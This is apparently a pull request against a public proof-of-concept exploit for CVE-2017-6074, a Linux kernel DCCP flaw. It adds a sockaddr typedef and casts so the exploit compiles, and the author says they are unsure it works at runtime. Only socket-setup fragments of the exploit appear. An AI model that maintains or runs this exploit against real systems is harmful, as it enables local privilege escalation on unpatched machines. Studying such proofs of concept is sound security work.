### PR TITLE
Fix compilation bug.

### DIFF
--- a/CVE-2017-6074/poc.c
+++ b/CVE-2017-6074/poc.c
@@ -72,6 +72,8 @@
 #define CATCH_AGAIN 16
 #define CATCH_AGAIN_SMALL 64
 
+typedef struct sockaddr* SOCKADDR;
+
 // Port is incremented on each use.
 static int port = 11000;
 
@@ -166,7 +168,7 @@ void dccp_init(struct dccp_handle *handle, int port) {
 		exit(EXIT_FAILURE);
 	}
 
-	int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));
+	int rv = bind(handle->s1, (SOCKADDR) &handle->sa, sizeof(handle->sa));
 	if (rv != 0) {
 		perror("bind()");
 		exit(EXIT_FAILURE);
@@ -194,7 +196,7 @@ void dccp_init(struct dccp_handle *handle, int port) {
 }
 
 void dccp_kmalloc_kfree(struct dccp_handle *handle) {
-	int rv = connect(handle->s2, &handle->sa, sizeof(handle->sa));
+	int rv = connect(handle->s2, (SOCKADDR) &handle->sa, sizeof(handle->sa));
 	if (rv != 0) {
 		perror("connect(SOCK_DCCP)");
 		exit(EXIT_FAILURE);
@@ -341,7 +343,7 @@ void dccp_connect_pad(struct dccp_handle *handle, int port) {
 		exit(EXIT_FAILURE);
 	}
 
-	int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));
+	int rv = bind(handle->s1, (SOCKADDR) &handle->sa, sizeof(handle->sa));
 	if (rv != 0) {
 		perror("bind()");
 		exit(EXIT_FAILURE);
@@ -359,7 +361,7 @@ void dccp_connect_pad(struct dccp_handle *handle, int port) {
 		exit(EXIT_FAILURE);
 	}
 
-	rv = connect(handle->s2, &handle->sa, sizeof(handle->sa));
+	rv = connect(handle->s2, (SOCKADDR) &handle->sa, sizeof(handle->sa));
 	if (rv != 0) {
 		perror("connect(SOCK_DCCP)");
 		exit(EXIT_FAILURE);


### PR DESCRIPTION
Not sure if this works at runtime (could be a null initialization), but in some compilers, "sockaddr" is undefined. I defined it in line 75.